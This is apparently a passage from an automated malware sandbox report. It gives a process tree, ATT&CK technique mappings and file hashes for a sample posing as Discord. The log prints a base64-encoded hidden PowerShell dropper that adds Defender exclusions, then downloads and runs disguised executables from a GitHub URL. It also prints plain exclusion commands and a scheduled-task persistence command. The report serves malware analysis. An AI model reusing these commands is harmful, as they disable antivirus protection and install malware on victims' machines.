AEcATQBBAFkAUQBCADAAQQBHAGsAQQBiAHcAQgB1AEEAQwBBAEEATABRAEIAWABBAEcAawBBAGIAZwBCAGsAQQBHADgAQQBkAHcAQgBUAEEASABRAEEAZQBRAEIAcwBBAEcAVQBBAEkAQQBCAEkAQQBHAGsAQQBaAEEAQgBrAEEARwBVAEEAYgBnAEEAZwBBAEMAMABBAFYAdwBCAGgAQQBHAGsAQQBkAEEAQQBLAEEASAAwAEEAIgA=
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:864
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand cABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEMAbwBtAG0AYQBuAGQAIAAiAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQAnACIACgBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0AQwBvAG0AbQBhAG4AZAAgACIAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAUAB1AGIAbABpAGMAXABEAG8AdwBuAGwAbwBhAGQAcwAnACIACgBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0AQwBvAG0AbQBhAG4AZAAgACIAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAHQAZQBtADMAMgAnACIACgBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0AQwBvAG0AbQBhAG4AZAAgACIAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcATwBXADYANAAnACIACgBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0AQwBvAG0AbQBhAG4AZAAgACIAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVwBpAG4AZABvAHcAcwAnACIACgAKACQAdQByAGwAMQAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AQQBtAGoAYQBkAEIAYQBsAGwAcwAvAFQARQBTAFQALwByAGEAdwAvAHIAZQBmAHMALwBoAGUAYQBkAHMALwBtAGEAaQBuAC8ARABpAHMAYwBvAHIAZAAuAGUAeABlACcACgAkAHUAcgBsADIAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AZwBpAHQAaAB1AGIALgBjAG8AbQAvAEEAbQBqAGEAZABCAGEAbABsAHMALwBUAEUAUwBUAC8AcgBhAHcALwByAGUAZgBzAC8AaABlAGEAZABzAC8AbQBhAGkAbgAvAEcAbwBvAGcAbABlAEMAaAByAG8AbQBlAC4AZQB4AGUAJwAKACQAdQByAGwAMwAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AQQBtAGoAYQBkAEIAYQBsAGwAcwAvAFQARQBTAFQALwByAGEAdwAvAHIAZQBmAHMALwBoAGUAYQBkAHMALwBtAGEAaQBuAC8AZQB4AHAAbABvAHIAZQByAC4AZQB4AGUAJwAKACQAdQByAGwANAAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AQQBtAGoAYQBkAEIAYQBsAGwAcwAvAFQARQBTAFQALwByAGEAdwAvAHIAZQBmAHMALwBoAGUAYQBkAHMALwBtAGEAaQBuAC8AcwB2AGMAaABvAHMAdAAuAGUAeABlACcACgAKACQAbABvAGMAYQB0AGkAbwBuAHMAIAA9ACAAQAAoAAoAIAAgACAAIAAnAEMAOgBcAFUAcwBlAHIAcwBcAFAAdQBiAGwAaQBjAFwARABvAHcAbgBsAG8AYQBkAHMAXABEAGkAcwBjAG8AcgBkAC4AZQB4AGUAJwAsAAoAIAAgACAAIAAnAEMAOgBcAFUAcwBlAHIAcwBcAFAAdQBiAGwAaQBjAFwARABvAHcAbgBsAG8AYQBkAHMAXABHAG8AbwBnAGwAZQBDAGgAcgBvAG0AZQAuAGUAeABlACcALAAKACAAIAAgACAAJwBDADoAXABVAHMAZQByAHMAXABQAHUAYgBsAGkAYwBcAEQAbwB3AG4AbABvAGEAZABzAFwAZQB4AHAAbABvAHIAZQByAC4AZQB4AGUAJwAsAAoAIAAgACAAIAAnAEMAOgBcAFUAcwBlAHIAcwBcAFAAdQBiAGwAaQBjAFwARABvAHcAbgBsAG8AYQBkAHMAXABzAHYAYwBoAG8AcwB0AC4AZQB4AGUAJwAKACkACgAKAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBsADEAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAGwAbwBjAGEAdABpAG8AbgBzAFsAMABdAAoASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACQAdQByAGwAMgAgAC0ATwB1AHQARgBpAGwAZQAgACQAbABvAGMAYQB0AGkAbwBuAHMAWwAxAF0ACgBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAbAAzACAALQBPAHUAdABGAGkAbABlACAAJABsAG8AYwBhAHQAaQBvAG4AcwBbADIAXQAKAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBsADQAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAGwAbwBjAGEAdABpAG8AbgBzAFsAMwBdAAoACgBmAG8AcgBlAGEAYwBoACAAKAAkAGwAbwBjAGEAdABpAG8AbgAgAGkAbgAgACQAbABvAGMAYQB0AGkAbwBuAHMAKQAgAHsACgAgACAAIAAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAbABvAGMAYQB0AGkAbwBuACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0AVwBhAGkAdAAKAH0A
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2792
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\ProgramData'"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4264
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Downloads'"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3304
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4736
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Windows\SysWOW64'"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5060
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5112
      - C:\Users\Public\Downloads\Discord.exe
        
        "C:\Users\Public\Downloads\Discord.exe"
        6⤵
        Checks computer location settings
        Drops startup file
        Executes dropped EXE
        Adds Run key to start application
        
        PID:4276
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\Downloads\Discord.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3668
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Discord.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5448
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Discord'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3540
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Discord'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3996
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Discord" /tr "C:\ProgramData\Discord"
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3720

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1468

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4324

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
713ad359b75fe6d947468ec1825202b9

SHA1
19dcd19f18a2ad6deb581451aad724bd44a592a4

SHA256
56572269ec031c63d966c6d3b4712600b908d38826c59c0f9a8225d0a783e9f4

SHA512
4df344dec422bed85b186909dc7f9c35126b3bb45e100f18fb95b4a9943ace242479adf5f0194b054d38b67032498f897a5a54b49026efee0c4797cb5a5e54e8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
c58ccb4da696442ae40d3db9e4b41c3f

SHA1
e27933a94d57f04c75b8bff25ad7012171917f87

SHA256
d0d75be801bf0c5f715665c73214bfa38fd714dd9ee846de410855d96dd75931

SHA512
82a7cd39758d67f1d177ce7f46a5ee560eb60207ca7ca1e39b9a08a269ed140532bf1ec85899a033a54d20a0d59592d1cd5f5d35f71da98f6b6e35cd904e1872

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
ef0e81b130f8dcf42e80097a75e5d04d

SHA1
d8694b7c5fba1ee2e73e69dd7790ca5b1cb882db

SHA256
fc53158d948d1742e3f960124f9fdb138eaa4aa711d0f43833fa893247de4918

SHA512
c85df1696537dfce601de46183b1b22d7f0007b0f695f1904bbd1a6e429d7787c3d6199bcecdb21936d811b35eeca57a9800bcd3a3b585569aabeb0b5b497efd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico

Filesize
70KB

MD5
e5e3377341056643b0494b6842c0b544

SHA1
d53fd8e256ec9d5cef8ef5387872e544a2df9108

SHA256
e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25

SHA512
83f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
4KB

MD5
5e5597301c202c1e7043c67bc6587d35

SHA1
59418abe77f730ca3bec9bbefdf50446dbb1ae96

SHA256
68b0534afba394a923747aa6a7947e9368557328e4bce88916ed8c0496bd1d21

SHA512
6faef228510f282d3f17c59184f57d6990451769410f630ebbd944077fa278136485847e759676c5725a93ae68d0346515e3cf651d5a2300937bc7c8d2acf07d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
3a6b61be7b504f0360b8e818ff41c6e9

SHA1
49d6a581032a90f657b25a4e61a4f2022db4d95d

SHA256
a1f00d4c7abbf61b54847c2596849b7b39dfbe5e6358f8a5fbfa25872267c8fa

SHA512
ea07b2361eb261e8fe3ec0c3a07923846a65645d89cb6f4989e6417925078cfced6d5025ef1dc1a8b8861ede3e93692f1fe0e979167f1f5cbce1ec3f9baa7e5b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
24KB

MD5
62aee047a3c6cf2fec2a29a34157633b

SHA1
51b6eed704d65a62d8793ea18885d12aa39a5cf2

SHA256
342e67b65a4070bbd6e7c2fbf75c98e727d9db45fa071181cae0f5eade726ddf

SHA512
21ee4907a0dcf077f9233542462b8bfd01d976dc1fe4a7b7c4ad70d691e7b9101bddcc292e13fc83a22f56355aa5b93949ac124c84da1f43a80851bf313d895e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
24KB

MD5
a18e33a424007376b810134dde07fec6

SHA1
3acbb4070e7fab6fea0f6c618aeca0964e39f7f8

SHA256
12852fe3bc04c3a3f6cdb76d7fa37cf0d7f91ffe801c70caf5ee4f5bb34e2821

SHA512
3a08afee6762546ba967965d72b90a0e0ed2a45bee0e195696c92f511c4b92634acdb669e6320359cb436e809c9672c0371042990aaf26b90da06da523ce6b9b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\MANIFEST-000001

Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
8KB

MD5
8fd705468cef9bb7ce97ba5497c8bd68

SHA1
c47c53ea47bde51b41f9f4a2485de480e0925fb4

SHA256
71cf978fcc06acf2e68292ab34989227ef2a34a6cf9c80a458db73e6de79a695

SHA512
98f9d31a2d5fca361087cbc17cebb93fcc837f46ab24bff22a31b3bf5adff79c71eace5bc03d5a3accc5bb9b57744917fa9cc90c9082cb19759f653d26126319

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5e22dd1cda88782a1f52f76e748ef957

SHA1
3231826619a06fa541e2bfb21da445bd7013b5ac

SHA256
73302eedcdcfa0f9639f0d00e50c19f7ff4b7bab9df431cfee38e4b94bd4ecec

SHA512
75039c01812a7c0bef9fc2d0b4b8867c9acf2daf6a8ade8171d8edc7c0a2ff11488554d30397fee424922346394f14eef7518943db769c35e6916bee26f16498

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
59dd010f331bcc981f419d86a2a0d658

SHA1
67a0eada7f9155eb45e24703ae293fdd8665eb6f

SHA256
1507b7130e3ea535b54a34c4a523b5be6a54016ccff9868d7834729f343f3684

SHA512
5488fc9e84a9ee02ed5c66409f9cb5439b9be43d1acb9589996f083a26ee149a2059329fd7c9a1b54a00a70e17c82db29190ed775fccd1a47ab53ac396ab216e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
08b59cf8e2e3a929ea95184bf5aa591a

SHA1
4f515ff72e582be6122d1642996c1e575c515e2b

SHA256
dc31980e5e8823ff48fd4c1e8fec022358d874c21d3ba766c64fae24ad3aeeeb

SHA512
c1af66be8dfaaf2ab50487e77438f9d78bca794fd3e2378cd4f4fb67b4038a02f606b9e8258c29cf0988400b72b903bf3d403b0b6c47c2bc87f4702d644eab71

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
85ce54ce614b625332ea3ccac4e0857f

SHA1
dc8e80dd46b9cd6dd39bff3e281090f952973884

SHA256
6814b74f3f95da7aa1de9f6e629aa3d908e3d1603f0a724bb3ae7ae381834e9c

SHA512
a67866176a3123dcb2cd5b1013901a0a2abea37c375f6d62a508977ecb8da1b89645395b4955b318cbcbcc3db9d12f754a3795918c519c3ffbba7748dee5a01b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
47d1715b78ee034489d6c8cfae820c5c

SHA1
f5a035dc4da2185d5160a1a7d045560e54b9a92d

SHA256
34f8a18234f994cbff36e71e372f68ba9ef7acd50c6182fc78a8d8180b279e0e

SHA512
8774213d536d7fbaff6288e17b908a6ad480c029a759918bf5d3278a8a6de9092458035a0ea97c04c675af5a28048945cecc7fc4180ef32671f952d6e3a04868

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b4b0efd35f253415b307a084476fa6da

SHA1
ecef2b25629ce59786db0ae06aadd3872b766624

SHA256
08988005841640b507c0e68b13d46e8afe5e245357864d856ea38f1e36a91c62

SHA512
db75d8927b9ece573cb648c1bb0c7726cf981a8a95890c609aa07b857c17be8689a93d37771a93ed1c6b1a1b2299ee2b8881f875ed36d247e38e69401fce373b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
e80e1a70b5afa334887f4c314a5bde3d

SHA1
7c6b1c3d89ba48c2f33e5c47d173a78f128757a3

SHA256
c4d1731477e105b3053816b0ca34080573a069a07a30151d5206d23b57be2e90

SHA512
6661ced013967a85e22fe73aba3970db52a5ae7bd5cd00c67ceaf494dd3963db0beb9d9e466bbd81c04faca7b99038660c19288cb2dae8ad406bdcbbc0da4a65

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
1a11402783a8686e08f8fa987dd07bca

SHA1
580df3865059f4e2d8be10644590317336d146ce

SHA256
9b1d1b468932a2d88548dc18504ac3066f8248079ecb083e919460bdb88398c0

SHA512
5f7f9f76d9d12a25fdc5b8d193391fb42c37515c657250fe01a9bfd9fe4cc4eab9d5ec254b2596ac1b9005f12511905f19fdae41f057062261d75bd83254b510

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
860b6a25e4b29f37d34502a3a1a41ab9

SHA1
bd6a3df843c83d1654ad99f749ea53fd3c0498b7

SHA256
e4e6c182d7f03de2859fd8f1dca9bdafc129aff10aea0fdab2838987366f1a7c

SHA512
5582b8b44ae8c258731185f2a18d21d5796c6d9830b4d508a6504a0fc0a21914650a87876276fc3fe301bf1fb238b57d7d8e1134f93c124883ba54c779786548

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ggw3oisp.fjs.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
6KB

MD5
0f7e70a17cdf82cc23d54206602f97ff

SHA1
c53eeea87835e3c6e4e650df1080bd71818b68e7

SHA256
89474e0b7ae5ea07af471bfb5ce6cc4411c0ab64162ac1c05857e1162b6b6f0e

SHA512
6afd8a5cdea4fdb6058f6a614cc8ad33620e044bc3292043e87dc0167c7d8040b541635ebd1f973a705d3f57af5d05c1de7bb27bdc3b30532bc1be21d60c362c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
6KB

MD5
c1c6a003c72da8de72f172b3ff2ce987

SHA1
cd66dad283774fd8b9f704c4aeaa421987726818

SHA256
3e5fe2550d717957b2761c8c0fa9d47ca3dfceafab9830c34e75a8c089ef1a78

SHA512
890934a46b2f58d91dfd3d785ac91c826bb1a6d5cf561b56bfa33fb768e91b864f75055d62fbfa0d5d0e089411d5e6e2a77e30547679c5f6ec3303ae5be1d8ca

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

Filesize
3KB

MD5
e57f9c70b9e669921c4389f4779c57bd

SHA1
bf40f4cdfb1d14e4de93b32cedbd5b21114564a9

SHA256
1c9ce8d0a8b0cf6e00f5c96add109a906e130c0bc54c0bd9ed5ea5dd9ea17b8f

SHA512
b98483291e6be4ccfcfb35d6d7a81e574e381bae43cb058a132579d491acf9eb5626960fcfceb2ec6b5a74ca473b5ea5700878e8ebddd8e99fc9efea401c0059

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

Filesize
3KB

MD5
0ea105ee2980fc116f475d0ace825f4e

SHA1
980747a2eb025e37de3e605afa8a56883aacc7ac

SHA256
2ea54cc6c4ff6b86369b84c46a7b3ea95f65b28408ef889ead9094e8776090d5

SHA512
3cfd2eb59aec5610def96685e843c6d03cad97e1b166b781d452ff1e935f027c7c8131296d82ef2e5bf742ca127832bf0067ab976c0a083dcc2d9f9af5ce3e18

Download Submit
C:\Users\Public\Downloads\Discord.exe

Filesize
66KB

MD5
879e4ad359e88bc384ee197e68728b50

SHA1
f7547bfe974d52fe71c5e8f5e8195732f1736509

SHA256
0cfc81ec769e4cb977cd2fadc68a766a2a80f80691c0b8f8517f468b8cf4fdfe

SHA512
23cc1aa66bf4158310258bcfa806c89085ec43a0f476d4e46d6da8c4f91a38b8b653a7a50c736592894d29301f95ef76866c3d920f1aeb2d51248bbeaa144e97

Download Submit
memory/1176-36-0x000002E630540000-0x000002E630702000-memory.dmp

Filesize
1.8MB

Download
memory/2616-13-0x00007FF9E0320000-0x00007FF9E0DE2000-memory.dmp

Filesize
10.8MB

Download
memory/2616-14-0x00007FF9E0320000-0x00007FF9E0DE2000-memory.dmp

Filesize
10.8MB

Download
memory/2616-8-0x000001E2964B0000-0x000001E2964D2000-memory.dmp

Filesize
136KB

Download
memory/2616-2-0x00007FF9E0323000-0x00007FF9E0325000-memory.dmp

Filesize
8KB

Download
memory/2616-15-0x00007FF9E0320000-0x00007FF9E0DE2000-memory.dmp

Filesize
10.8MB

Download
memory/2616-18-0x00007FF9E0320000-0x00007FF9E0DE2000-memory.dmp

Filesize
10.8MB

Download
memory/4276-289-0x0000000000610000-0x0000000000626000-memory.dmp

Filesize
88KB

Download
memory/4276-373-0x000000001D390000-0x000000001D39C000-memory.dmp

Filesize
48KB

Download